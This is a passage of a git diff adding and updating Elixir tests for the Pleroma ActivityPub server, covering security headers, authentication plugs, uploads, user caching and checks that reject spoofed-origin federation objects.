EnsureUserKeyPlug.call(%{}) + + assert Map.has_key?(conn.assigns, :user) + end +end diff --git a/test/plugs/http_security_plug_test.exs b/test/plugs/http_security_plug_test.exs new file mode 100644 index 000000000..169c3b3a8 --- /dev/null +++ b/test/plugs/http_security_plug_test.exs @@ -0,0 +1,79 @@ +defmodule Pleroma.Web.Plugs.HTTPSecurityPlugTest do + use Pleroma.Web.ConnCase + alias Pleroma.Config + alias Plug.Conn + + test "it sends CSP headers when enabled", %{conn: conn} do + Config.put([:http_security, :enabled], true) + + conn = + conn + |> get("/api/v1/instance") + + refute Conn.get_resp_header(conn, "x-xss-protection") == [] + refute Conn.get_resp_header(conn, "x-permitted-cross-domain-policies") == [] + refute Conn.get_resp_header(conn, "x-frame-options") == [] + refute Conn.get_resp_header(conn, "x-content-type-options") == [] + refute Conn.get_resp_header(conn, "x-download-options") == [] + refute Conn.get_resp_header(conn, "referrer-policy") == [] + refute Conn.get_resp_header(conn, "content-security-policy") == [] + end + + test "it does not send CSP headers when disabled", %{conn: conn} do + Config.put([:http_security, :enabled], false) + + conn = + conn + |> get("/api/v1/instance") + + assert Conn.get_resp_header(conn, "x-xss-protection") == [] + assert Conn.get_resp_header(conn, "x-permitted-cross-domain-policies") == [] + assert Conn.get_resp_header(conn, "x-frame-options") == [] + assert Conn.get_resp_header(conn, "x-content-type-options") == [] + assert Conn.get_resp_header(conn, "x-download-options") == [] + assert Conn.get_resp_header(conn, "referrer-policy") == [] + assert Conn.get_resp_header(conn, "content-security-policy") == [] + end + + test "it sends STS headers when enabled", %{conn: conn} do + Config.put([:http_security, :enabled], true) + Config.put([:http_security, :sts], true) + + conn = + conn + |> get("/api/v1/instance") + + refute Conn.get_resp_header(conn, "strict-transport-security") == [] + refute Conn.get_resp_header(conn, "expect-ct") == [] + end + + test "it does not send STS headers when disabled", %{conn: conn} do + Config.put([:http_security, :enabled], true) + Config.put([:http_security, :sts], false) + + conn = + conn + |> get("/api/v1/instance") + + assert Conn.get_resp_header(conn, "strict-transport-security") == [] + assert Conn.get_resp_header(conn, "expect-ct") == [] + end + + test "referrer-policy header reflects configured value", %{conn: conn} do + Config.put([:http_security, :enabled], true) + + conn = + conn + |> get("/api/v1/instance") + + assert Conn.get_resp_header(conn, "referrer-policy") == ["same-origin"] + + Config.put([:http_security, :referrer_policy], "no-referrer") + + conn = + build_conn() + |> get("/api/v1/instance") + + assert Conn.get_resp_header(conn, "referrer-policy") == ["no-referrer"] + end +end diff --git a/test/plugs/legacy_authentication_plug_test.exs b/test/plugs/legacy_authentication_plug_test.exs new file mode 100644 index 000000000..383a22ff8 --- /dev/null +++ b/test/plugs/legacy_authentication_plug_test.exs @@ -0,0 +1,82 @@ +defmodule Pleroma.Plugs.LegacyAuthenticationPlugTest do + use Pleroma.Web.ConnCase, async: true + + alias Pleroma.Plugs.LegacyAuthenticationPlug + alias Pleroma.User + + import Mock + + setup do + # password is "password" + user = %User{ + id: 1, + name: "dude", + password_hash: + "$6$9psBWV8gxkGOZWBz$PmfCycChoxeJ3GgGzwvhlgacb9mUoZ.KUXNCssekER4SJ7bOK53uXrHNb2e4i8yPFgSKyzaW9CcmrDXWIEMtD1" + } + + %{user: user} + end + + test "it does nothing if a user is assigned", %{conn: conn, user: user} do + conn = + conn + |> assign(:auth_credentials, %{username: "dude", password: "password"}) + |> assign(:auth_user, user) + |> assign(:user, %User{}) + + ret_conn = + conn + |> LegacyAuthenticationPlug.call(%{}) + + assert ret_conn == conn + end + + test "it authenticates the auth_user if present and password is correct and resets the password", + %{ + conn: conn, + user: user + } do + conn = + conn + |> assign(:auth_credentials, %{username: "dude", password: "password"}) + |> assign(:auth_user, user) + + conn = + with_mock User, + reset_password: fn user, %{password: password, password_confirmation: password} -> + send(self(), :reset_password) + {:ok, user} + end do + conn + |> LegacyAuthenticationPlug.call(%{}) + end + + assert_received :reset_password + assert conn.assigns.user == user + end + + test "it does nothing if the password is wrong", %{ + conn: conn, + user: user + } do + conn = + conn + |> assign(:auth_credentials, %{username: "dude", password: "wrong_password"}) + |> assign(:auth_user, user) + + ret_conn = + conn + |> LegacyAuthenticationPlug.call(%{}) + + assert conn == ret_conn + end + + test "with no credentials or user it does nothing", %{conn: conn} do + ret_conn = + conn + |> LegacyAuthenticationPlug.call(%{}) + + assert ret_conn == conn + end +end diff --git a/test/plugs/session_authentication_plug_test.exs b/test/plugs/session_authentication_plug_test.exs new file mode 100644 index 000000000..bb51bc0db --- /dev/null +++ b/test/plugs/session_authentication_plug_test.exs @@ -0,0 +1,59 @@ +defmodule Pleroma.Plugs.SessionAuthenticationPlugTest do + use Pleroma.Web.ConnCase, async: true + + alias Pleroma.Plugs.SessionAuthenticationPlug + alias Pleroma.User + + setup %{conn: conn} do + session_opts = [ + store: :cookie, + key: "_test", + signing_salt: "cooldude" + ] + + conn = + conn + |> Plug.Session.call(Plug.Session.init(session_opts)) + |> fetch_session + |> assign(:auth_user, %User{id: 1}) + + %{conn: conn} + end + + test "it does nothing if a user is assigned", %{conn: conn} do + conn = + conn + |> assign(:user, %User{}) + + ret_conn = + conn + |> SessionAuthenticationPlug.call(%{}) + + assert ret_conn == conn + end + + test "if the auth_user has the same id as the user_id in the session, it assigns the user", %{ + conn: conn + } do + conn = + conn + |> put_session(:user_id, conn.assigns.auth_user.id) + |> SessionAuthenticationPlug.call(%{}) + + assert conn.assigns.user == conn.assigns.auth_user + end + + test "if the auth_user has a different id as the user_id in the session, it does nothing", %{ + conn: conn + } do + conn = + conn + |> put_session(:user_id, -1) + + ret_conn = + conn + |> SessionAuthenticationPlug.call(%{}) + + assert ret_conn == conn + end +end diff --git a/test/plugs/set_user_session_id_plug_test.exs b/test/plugs/set_user_session_id_plug_test.exs new file mode 100644 index 000000000..5edc0dab8 --- /dev/null +++ b/test/plugs/set_user_session_id_plug_test.exs @@ -0,0 +1,39 @@ +defmodule Pleroma.Plugs.SetUserSessionIdPlugTest do + use Pleroma.Web.ConnCase, async: true + + alias Pleroma.Plugs.SetUserSessionIdPlug + alias Pleroma.User + + setup %{conn: conn} do + session_opts = [ + store: :cookie, + key: "_test", + signing_salt: "cooldude" + ] + + conn = + conn + |> Plug.Session.call(Plug.Session.init(session_opts)) + |> fetch_session + + %{conn: conn} + end + + test "doesn't do anything if the user isn't set", %{conn: conn} do + ret_conn = + conn + |> SetUserSessionIdPlug.call(%{}) + + assert ret_conn == conn + end + + test "sets the user_id in the session to the user id of the user assign", %{conn: conn} do + conn = + conn + |> assign(:user, %User{id: 1}) + |> SetUserSessionIdPlug.call(%{}) + + id = get_session(conn, :user_id) + assert id == 1 + end +end diff --git a/test/plugs/user_enabled_plug_test.exs b/test/plugs/user_enabled_plug_test.exs new file mode 100644 index 000000000..ee4f72ccf --- /dev/null +++ b/test/plugs/user_enabled_plug_test.exs @@ -0,0 +1,39 @@ +defmodule Pleroma.Plugs.UserEnabledPlugTest do + use Pleroma.Web.ConnCase, async: true + + alias Pleroma.Plugs.UserEnabledPlug + import Pleroma.Factory + + test "doesn't do anything if the user isn't set", %{conn: conn} do + ret_conn = + conn + |> UserEnabledPlug.call(%{}) + + assert ret_conn == conn + end + + test "with a user that is deactivated, it removes that user", %{conn: conn} do + user = insert(:user, info: %{"deactivated" => true}) + + conn = + conn + |> assign(:user, user) + |> UserEnabledPlug.call(%{}) + + assert conn.assigns.user == nil + end + + test "with a user that is not deactivated, it does nothing", %{conn: conn} do + user = insert(:user) + + conn = + conn + |> assign(:user, user) + + ret_conn = + conn + |> UserEnabledPlug.call(%{}) + + assert conn == ret_conn + end +end diff --git a/test/plugs/user_fetcher_plug_test.exs b/test/plugs/user_fetcher_plug_test.exs new file mode 100644 index 000000000..5195a0c4a --- /dev/null +++ b/test/plugs/user_fetcher_plug_test.exs @@ -0,0 +1,37 @@ +defmodule Pleroma.Plugs.UserFetcherPlugTest do + use Pleroma.Web.ConnCase, async: true + + alias Pleroma.Plugs.UserFetcherPlug + import Pleroma.Factory + + setup do + user = insert(:user) + %{user: user} + end + + test "if an auth_credentials assign is present, it tries to fetch the user and assigns it", %{ + conn: conn, + user: user + } do + conn = + conn + |> assign(:auth_credentials, %{ + username: user.nickname, + password: nil + }) + + conn = + conn + |> UserFetcherPlug.call(%{}) + + assert conn.assigns[:auth_user] == user + end + + test "without a credential assign it doesn't do anything", %{conn: conn} do + ret_conn = + conn + |> UserFetcherPlug.call(%{}) + + assert conn == ret_conn + end +end diff --git a/test/plugs/user_is_admin_plug_test.exs b/test/plugs/user_is_admin_plug_test.exs new file mode 100644 index 000000000..ddf9eb139 --- /dev/null +++ b/test/plugs/user_is_admin_plug_test.exs @@ -0,0 +1,39 @@ +defmodule Pleroma.Plugs.UserIsAdminPlugTest do + use Pleroma.Web.ConnCase, async: true + + alias Pleroma.Plugs.UserIsAdminPlug + import Pleroma.Factory + + test "accepts a user that is admin", %{conn: conn} do + user = insert(:user, info: %{"is_admin" => true}) + + conn = + build_conn() + |> assign(:user, user) + + ret_conn = + conn + |> UserIsAdminPlug.call(%{}) + + assert conn == ret_conn + end + + test "denies a user that isn't admin", %{conn: conn} do + user = insert(:user) + + conn = + build_conn() + |> assign(:user, user) + |> UserIsAdminPlug.call(%{}) + + assert conn.status == 403 + end + + test "denies when a user isn't set", %{conn: conn} do + conn = + build_conn() + |> UserIsAdminPlug.call(%{}) + + assert conn.status == 403 + end +end diff --git a/test/support/httpoison_mock.ex b/test/support/httpoison_mock.ex index 4ee2feb95..e7344500f 100644 --- a/test/support/httpoison_mock.ex +++ b/test/support/httpoison_mock.ex @@ -1,8 +1,79 @@ defmodule HTTPoisonMock do alias HTTPoison.Response + def process_request_options(options), do: options + def get(url, body \\ [], headers \\ []) + def get("https://prismo.news/@mxb", _, _) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/https___prismo.news__mxb.json") + }} + end + + def get("https://osada.macgirvin.com/channel/mike", _, _) do + {:ok, + %Response{ + status_code: 200, + body: + File.read!("test/fixtures/httpoison_mock/https___osada.macgirvin.com_channel_mike.json") + }} + end + + def get( + "https://osada.macgirvin.com/.well-known/webfinger?resource=acct:mike@osada.macgirvin.com", + _, + _ + ) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/mike@osada.macgirvin.com.json") + }} + end + + def get("https://info.pleroma.site/activity.json", _, _) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json") + }} + end + + def get("https://info.pleroma.site/activity2.json", _, _) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/https__info.pleroma.site_activity2.json") + }} + end + + def get("https://info.pleroma.site/activity3.json", _, _) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/https__info.pleroma.site_activity3.json") + }} + end + + def get("https://info.pleroma.site/activity4.json", _, _) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/https__info.pleroma.site_activity4.json") + }} + end + + def get("https://info.pleroma.site/actor.json", _, _) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/https___info.pleroma.site_actor.json") + }} + end + def get("https://puckipedia.com/", [Accept: "application/activity+json"], _) do {:ok, %Response{ @@ -396,6 +467,17 @@ defmodule HTTPoisonMock do }} end + def get("http://mastodon.example.org/users/admin/statuses/100787282858396771", _, _) do + {:ok, + %Response{ + status_code: 200, + body: + File.read!( + "test/fixtures/httpoison_mock/http___mastodon.example.org_users_admin_status_1234.json" + ) + }} + end + def get( "https://pawoo.net/.well-known/webfinger", [Accept: "application/xrd+xml,application/jrd+json"], @@ -684,6 +766,14 @@ defmodule HTTPoisonMock do }} end + def get("https://n1u.moe/users/rye", [Accept: "application/activity+json"], _) do + {:ok, + %Response{ + status_code: 200, + body: File.read!("test/fixtures/httpoison_mock/rye.json") + }} + end + def get( "https://mst3k.interlinked.me/users/luciferMysticus", [Accept: "application/activity+json"], diff --git a/test/upload_test.exs b/test/upload_test.exs index d273ea5f6..b2ce755d2 100644 --- a/test/upload_test.exs +++ b/test/upload_test.exs @@ -2,7 +2,58 @@ defmodule Pleroma.UploadTest do alias Pleroma.Upload use Pleroma.DataCase - describe "Storing a file" do + describe "Storing a file with the Local uploader" do + setup do + uploader = Pleroma.Config.get([Pleroma.Upload, :uploader]) + filters = Pleroma.Config.get([Pleroma.Upload, :filters]) + + unless uploader == Pleroma.Uploaders.Local || filters != [] do + Pleroma.Config.put([Pleroma.Upload, :uploader], Pleroma.Uploaders.Local) + Pleroma.Config.put([Pleroma.Upload, :filters], []) + + on_exit(fn -> + Pleroma.Config.put([Pleroma.Upload, :uploader], uploader) + Pleroma.Config.put([Pleroma.Upload, :filters], filters) + end) + end + + :ok + end + + test "returns a media url" do + File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg") + + file = %Plug.Upload{ + content_type: "image/jpg", + path: Path.absname("test/fixtures/image_tmp.jpg"), + filename: "image.jpg" + } + + {:ok, data} = Upload.store(file) + + assert %{"url" => [%{"href" => url}]} = data + + assert String.starts_with?(url, Pleroma.Web.base_url() <> "/media/") + end + + test "returns a media url with configured base_url" do + base_url = "https://cache.pleroma.social" + + File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg") + + file = %Plug.Upload{ + content_type: "image/jpg", + path: Path.absname("test/fixtures/image_tmp.jpg"), + filename: "image.jpg" + } + + {:ok, data} = Upload.store(file, base_url: base_url) + + assert %{"url" => [%{"href" => url}]} = data + + assert String.starts_with?(url, base_url <> "/media/") + end + test "copies the file to the configured folder with deduping" do File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg") @@ -12,10 +63,11 @@ defmodule Pleroma.UploadTest do filename: "an [image.jpg" } - data = Upload.store(file, true) + {:ok, data} = Upload.store(file, filters: [Pleroma.Upload.Filter.Dedupe]) - assert data["name"] == - "e7a6d0cf595bff76f14c9a98b6c199539559e8b844e02e51e5efcfd1f614a2df.jpeg" + assert List.first(data["url"])["href"] == + Pleroma.Web.base_url() <> + "/media/e7a6d0cf595bff76f14c9a98b6c199539559e8b844e02e51e5efcfd1f614a2df.jpg" end test "copies the file to the configured folder without deduping" do @@ -27,7 +79,7 @@ defmodule Pleroma.UploadTest do filename: "an [image.jpg" } - data = Upload.store(file, false) + {:ok, data} = Upload.store(file) assert data["name"] == "an [image.jpg" end @@ -40,7 +92,7 @@ defmodule Pleroma.UploadTest do filename: "an [image.jpg" } - data = Upload.store(file, true) + {:ok, data} = Upload.store(file, filters: [Pleroma.Upload.Filter.Dedupe]) assert hd(data["url"])["mediaType"] == "image/jpeg" end @@ -53,7 +105,7 @@ defmodule Pleroma.UploadTest do filename: "an [image" } - data = Upload.store(file, false) + {:ok, data} = Upload.store(file) assert data["name"] == "an [image.jpg" end @@ -66,7 +118,7 @@ defmodule Pleroma.UploadTest do filename: "an [image.blah" } - data = Upload.store(file, false) + {:ok, data} = Upload.store(file) assert data["name"] == "an [image.jpg" end @@ -79,8 +131,22 @@ defmodule Pleroma.UploadTest do filename: "test.txt" } - data = Upload.store(file, false) + {:ok, data} = Upload.store(file) assert data["name"] == "test.txt" end + + test "copies the file to the configured folder with anonymizing filename" do + File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg") + + file = %Plug.Upload{ + content_type: "image/jpg", + path: Path.absname("test/fixtures/image_tmp.jpg"), + filename: "an [image.jpg" + } + + {:ok, data} = Upload.store(file, filters: [Pleroma.Upload.Filter.AnonymizeFilename]) + + refute data["name"] == "an [image.jpg" + end end end diff --git a/test/user_test.exs b/test/user_test.exs index 352a16687..231f1d94d 100644 --- a/test/user_test.exs +++ b/test/user_test.exs @@ -55,6 +55,15 @@ defmodule Pleroma.UserTest do {:error, _} = User.follow(blockee, blocker) end + test "local users do not automatically follow local locked accounts" do + follower = insert(:user, info: %{"locked" => true}) + followed = insert(:user, info: %{"locked" => true}) + + {:ok, follower} = User.maybe_direct_follow(follower, followed) + + refute User.following?(follower, followed) + end + # This is a somewhat useless test. # test "following a remote user will ensure a websub subscription is present" do # user = insert(:user) @@ -166,6 +175,25 @@ defmodule Pleroma.UserTest do fetched_user = User.get_or_fetch_by_nickname("nonexistant") assert fetched_user == nil end + + test "updates an existing user, if stale" do + a_week_ago = NaiveDateTime.add(NaiveDateTime.utc_now(), -604_800) + + orig_user = + insert( + :user, + local: false, + nickname: "admin@mastodon.example.org", + ap_id: "http://mastodon.example.org/users/admin", + last_refreshed_at: a_week_ago + ) + + assert orig_user.last_refreshed_at == a_week_ago + + user = User.get_or_fetch_by_ap_id("http://mastodon.example.org/users/admin") + + refute user.last_refreshed_at == orig_user.last_refreshed_at + end end test "returns an ap_id for a user" do @@ -220,7 +248,7 @@ defmodule Pleroma.UserTest do end test "it has required fields" do - [:name, :nickname, :ap_id] + [:name, :ap_id] |> Enum.each(fn field -> cs = User.remote_user_creation(Map.delete(@valid_remote, field)) refute cs.valid? @@ -459,11 +487,13 @@ defmodule Pleroma.UserTest do assert addressed in recipients end - test ".deactivate deactivates a user" do + test ".deactivate can de-activate then re-activate a user" do user = insert(:user) assert false == !!user.info["deactivated"] {:ok, user} = User.deactivate(user) assert true == user.info["deactivated"] + {:ok, user} = User.deactivate(user, false) + assert false == !!user.info["deactivated"] end test ".delete deactivates a user, all follow relationships and all create activities" do @@ -481,7 +511,7 @@ defmodule Pleroma.UserTest do {:ok, _, _} = CommonAPI.favorite(activity.id, follower) {:ok, _, _} = CommonAPI.repeat(activity.id, follower) - :ok = User.delete(user) + {:ok, _} = User.delete(user) followed = Repo.get(User, followed.id) follower = Repo.get(User, follower.id) @@ -507,4 +537,57 @@ defmodule Pleroma.UserTest do assert {:ok, %User{}} = User.insert_or_update_user(data) end + + describe "per-user rich-text filtering" do + test "html_filter_policy returns nil when rich-text is enabled" do + user = insert(:user) + + assert nil == User.html_filter_policy(user) + end + + test "html_filter_policy returns TwitterText scrubber when rich-text is disabled" do + user = insert(:user, %{info: %{"no_rich_text" => true}}) + + assert Pleroma.HTML.Scrubber.TwitterText == User.html_filter_policy(user) + end + end + + describe "caching" do + test "invalidate_cache works" do + user = insert(:user) + user_info = User.get_cached_user_info(user) + + User.invalidate_cache(user) + + {:ok, nil} = Cachex.get(:user_cache, "ap_id:#{user.ap_id}") + {:ok, nil} = Cachex.get(:user_cache, "nickname:#{user.nickname}") + {:ok, nil} = Cachex.get(:user_cache, "user_info:#{user.id}") + end + + test "User.delete() plugs any possible zombie objects" do + user = insert(:user) + + {:ok, _} = User.delete(user) + + {:ok, cached_user} = Cachex.get(:user_cache, "ap_id:#{user.ap_id}") + + assert cached_user != user + + {:ok, cached_user} = Cachex.get(:user_cache, "nickname:#{user.ap_id}") + + assert cached_user != user + end + end + + describe "User.search" do + test "finds a user, ranking by similarity" do + user = insert(:user, %{name: "lain"}) + user_two = insert(:user, %{name: "ean"}) + user_three = insert(:user, %{name: "ebn", nickname: "lain@mastodon.social"}) + user_four = insert(:user, %{nickname: "lain@pleroma.soykaf.com"}) + + assert user_four == + User.search("lain@ple") |> List.first() |> Map.put(:search_distance, nil) + end + end end diff --git a/test/web/activity_pub/activity_pub_controller_test.exs b/test/web/activity_pub/activity_pub_controller_test.exs index 3ed7be402..1c24b348c 100644 --- a/test/web/activity_pub/activity_pub_controller_test.exs +++ b/test/web/activity_pub/activity_pub_controller_test.exs @@ -5,6 +5,28 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do alias Pleroma.{Repo, User} alias Pleroma.Activity + describe "/relay" do + test "with the relay active, it returns the relay user", %{conn: conn} do + res = + conn + |> get(activity_pub_path(conn, :relay)) + |> json_response(200) + + assert res["id"] =~ "/relay" + end + + test "with the relay disabled, it returns 404", %{conn: conn} do + Pleroma.Config.put([:instance, :allow_relay], false) + + res = + conn + |> get(activity_pub_path(conn, :relay)) + |> json_response(404) + + Pleroma.Config.put([:instance, :allow_relay], true) + end + end + describe "/users/:nickname" do test "it returns a json representation of the user", %{conn: conn} do user = insert(:user) @@ -46,7 +68,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do end end - describe "/users/:nickname/inbox" do + describe "/inbox" do test "it inserts an incoming activity into the database", %{conn: conn} do data = File.read!("test/fixtures/mastodon-post-activity.json") |> Poison.decode!() @@ -62,6 +84,27 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do end end + describe "/users/:nickname/inbox" do + test "it inserts an incoming activity into the database", %{conn: conn} do + user = insert(:user) + + data = + File.read!("test/fixtures/mastodon-post-activity.json") + |> Poison.decode!() + |> Map.put("bcc", [user.ap_id]) + + conn = + conn + |> assign(:valid_signature, true) + |> put_req_header("content-type", "application/activity+json") + |> post("/users/#{user.nickname}/inbox", data) + + assert "ok" == json_response(conn, 200) + :timer.sleep(500) + assert Activity.get_by_ap_id(data["id"]) + end + end + describe "/users/:nickname/outbox" do test "it returns a note activity in a collection", %{conn: conn} do note_activity = insert(:note_activity) diff --git a/test/web/activity_pub/activity_pub_test.exs b/test/web/activity_pub/activity_pub_test.exs index 1cf7d6bbc..35c381ac3 100644 --- a/test/web/activity_pub/activity_pub_test.exs +++ b/test/web/activity_pub/activity_pub_test.exs @@ -476,6 +476,54 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubTest do end end + describe "timeline post-processing" do + test "it filters broken threads" do + user1 = insert(:user) + user2 = insert(:user) + user3 = insert(:user) + + {:ok, user1} = User.follow(user1, user3) + assert User.following?(user1, user3) + + {:ok, user2} = User.follow(user2, user3) + assert User.following?(user2, user3) + + {:ok, user3} = User.follow(user3, user2) + assert User.following?(user3, user2) + + {:ok, public_activity} = CommonAPI.post(user3, %{"status" => "hi 1"}) + + {:ok, private_activity_1} = + CommonAPI.post(user3, %{"status" => "hi 2", "visibility" => "private"}) + + {:ok, private_activity_2} = + CommonAPI.post(user2, %{ + "status" => "hi 3", + "visibility" => "private", + "in_reply_to_status_id" => private_activity_1.id + }) + + {:ok, private_activity_3} = + CommonAPI.post(user3, %{ + "status" => "hi 4", + "visibility" => "private", + "in_reply_to_status_id" => private_activity_2.id + }) + + assert user1.following == [user3.ap_id <> "/followers", user1.ap_id] + + activities = ActivityPub.fetch_activities([user1.ap_id | user1.following]) + + assert [public_activity, private_activity_1, private_activity_3] == activities + assert length(activities) == 3 + + activities = ActivityPub.contain_timeline(activities, user1) + + assert [public_activity, private_activity_1] == activities + assert length(activities) == 2 + end + end + test "it can fetch plume articles" do {:ok, object} = ActivityPub.fetch_object_from_id( diff --git a/test/web/activity_pub/relay_test.exs b/test/web/activity_pub/relay_test.exs new file mode 100644 index 000000000..41d13e055 --- /dev/null +++ b/test/web/activity_pub/relay_test.exs @@ -0,0 +1,11 @@ +defmodule Pleroma.Web.ActivityPub.RelayTest do + use Pleroma.DataCase + + alias Pleroma.Web.ActivityPub.Relay + + test "gets an actor for the relay" do + user = Relay.get_actor() + + assert user.ap_id =~ "/relay" + end +end diff --git a/test/web/activity_pub/transmogrifier_test.exs b/test/web/activity_pub/transmogrifier_test.exs index e2926d495..829da0a65 100644 --- a/test/web/activity_pub/transmogrifier_test.exs +++ b/test/web/activity_pub/transmogrifier_test.exs @@ -121,6 +121,38 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do "<p>henlo from my Psion netBook</p><p>message sent from my Psion netBook</p>" end + test "it works for incoming announces with actor being inlined (kroeg)" do + data = File.read!("test/fixtures/kroeg-announce-with-inline-actor.json") |> Poison.decode!() + + {:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data) + + assert data["actor"] == "https://puckipedia.com/" + end + + test "it works for incoming notices with tag not being an array (kroeg)" do + data = File.read!("test/fixtures/kroeg-array-less-emoji.json") |> Poison.decode!() + + {:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data) + + assert data["object"]["emoji"] == %{ + "icon_e_smile" => "https://puckipedia.com/forum/images/smilies/icon_e_smile.png" + } + + data = File.read!("test/fixtures/kroeg-array-less-hashtag.json") |> Poison.decode!() + + {:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data) + + assert "test" in data["object"]["tag"] + end + + test "it works for incoming notices with url not being a string (prismo)" do + data = File.read!("test/fixtures/prismo-url-map.json") |> Poison.decode!() + + {:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data) + + assert data["object"]["url"] == "https://prismo.news/posts/83" + end + test "it works for incoming follow requests" do user = insert(:user) @@ -329,6 +361,26 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do refute Repo.get(Activity, activity.id) end + test "it fails for incoming deletes with spoofed origin" do + activity = insert(:note_activity) + + data = + File.read!("test/fixtures/mastodon-delete.json") + |> Poison.decode!() + + object = + data["object"] + |> Map.put("id", activity.data["object"]["id"]) + + data = + data + |> Map.put("object", object) + + :error = Transmogrifier.handle_incoming(data) + + assert Repo.get(Activity, activity.id) + end + test "it works for incoming unannounces with an existing notice" do user = insert(:user) {:ok, activity} = CommonAPI.post(user, %{"status" => "hey"}) @@ -671,7 +723,9 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do {:ok, activity} = CommonAPI.post(user, %{"status" => "hey"}) {:ok, modified} = Transmogrifier.prepare_outgoing(activity.data) - assert modified["@context"] == "https://www.w3.org/ns/activitystreams" + assert modified["@context"] == + Pleroma.Web.ActivityPub.Utils.make_json_ld_header()["@context"] + assert modified["object"]["conversation"] == modified["context"] end @@ -709,6 +763,39 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do assert modified["object"]["inReplyTo"] == "http://gs.example.org:4040/index.php/notice/29" end + + test "it strips internal hashtag data" do + user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "#2hu"}) + + expected_tag = %{ + "href" => Pleroma.Web.Endpoint.url() <> "/tags/2hu", + "type" => "Hashtag", + "name" => "#2hu" + } + + {:ok, modified} = Transmogrifier.prepare_outgoing(activity.data) + + assert modified["object"]["tag"] == [expected_tag] + end + + test "it strips internal fields" do + user = insert(:user) + + {:ok, activity} = CommonAPI.post(user, %{"status" => "#2hu :moominmamma:"}) + + {:ok, modified} = Transmogrifier.prepare_outgoing(activity.data) + + assert length(modified["object"]["tag"]) == 2 + + assert is_nil(modified["object"]["emoji"]) + assert is_nil(modified["object"]["likes"]) + assert is_nil(modified["object"]["like_count"]) + assert is_nil(modified["object"]["announcements"]) + assert is_nil(modified["object"]["announcement_count"]) + assert is_nil(modified["object"]["context_id"]) + end end describe "user upgrade" do @@ -798,4 +885,114 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do assert rewritten["url"] == "http://example.com" end end + + describe "actor origin containment" do + test "it rejects objects with a bogus origin" do + {:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity.json") + end + + test "it rejects activities which reference objects with bogus origins" do + data = %{ + "@context" => "https://www.w3.org/ns/activitystreams", + "id" => "http://mastodon.example.org/users/admin/activities/1234", + "actor" => "http://mastodon.example.org/users/admin", + "to" => ["https://www.w3.org/ns/activitystreams#Public"], + "object" => "https://info.pleroma.site/activity.json", + "type" => "Announce" + } + + :error = Transmogrifier.handle_incoming(data) + end + + test "it rejects objects when attributedTo is wrong (variant 1)" do + {:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity2.json") + end + + test "it rejects activities which reference objects that have an incorrect attribution (variant 1)" do + data = %{ + "@context" => "https://www.w3.org/ns/activitystreams", + "id" => "http://mastodon.example.org/users/admin/activities/1234", + "actor" => "http://mastodon.example.org/users/admin", + "to" => ["https://www.w3.org/ns/activitystreams#Public"], + "object" => "https://info.pleroma.site/activity2.json", + "type" => "Announce" + } + + :error = Transmogrifier.handle_incoming(data) + end + + test "it rejects objects when attributedTo is wrong (variant 2)" do + {:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity3.json") + end + + test "it rejects activities which reference objects that have an incorrect attribution (variant 2)" do + data = %{ + "@context" => "https://www.w3.org/ns/activitystreams", + "id" => "http://mastodon.example.org/users/admin/activities/1234", + "actor" => "http://mastodon.example.org/users/admin", + "to" => ["https://www.w3.org/ns/activitystreams#Public"], + "object" => "https://info.pleroma.site/activity3.json", + "type" => "Announce" + } + + :error = Transmogrifier.handle_incoming(data) + end + end + + describe "general origin containment" do + test "contain_origin_from_id() catches obvious spoofing attempts" do + data = %{ + "id" => "http://example.com/~alyssa/activities/1234.json" + } + + :error = + Transmogrifier.contain_origin_from_id( + "http://example.org/~alyssa/activities/1234.json", + data + ) + end + + test "contain_origin_from_id() allows alternate IDs within the same origin domain" do + data = %{ + "id" => "http://example.com/~alyssa/activities/1234.json" + } + + :ok = + Transmogrifier.contain_origin_from_id( + "http://example.com/~alyssa/activities/1234", + data + ) + end + + test "contain_origin_from_id() allows matching IDs" do + data = %{ + "id" => "http://example.com/~alyssa/activities/1234.json" + } + + :ok = + Transmogrifier.contain_origin_from_id( + "http://example.com/~alyssa/activities/1234.json", + data + ) + end + + test "users cannot be collided through fake direction spoofing attempts" do + user = + insert(:user, %{ + nickname: "rye@niu.moe", + local: false, + ap_id: "https://niu.moe/users/rye", + follower_address: User.ap_followers(%User{nickname: "rye@niu.moe"}) + }) + + {:error, _} = User.get_or_fetch_by_ap_id("https://n1u.moe/users/rye") + end + + test "all objects with fake directions are rejected by the object fetcher" do + {:error, _} = + ActivityPub.fetch_and_contain_remote_object_from_id( + "https://info.pleroma.site/activity4.json" + ) + end + end end diff --git a/test/web/activity_pub/views/object_view_test.exs b/test/web/activity_pub/views/object_view_test.exs index 6a1311be7..d144a77fc 100644 --- a/test/web/activity_pub/views/object_view_test.exs +++ b/test/web/activity_pub/views/object_view_test.exs @@ -2,6 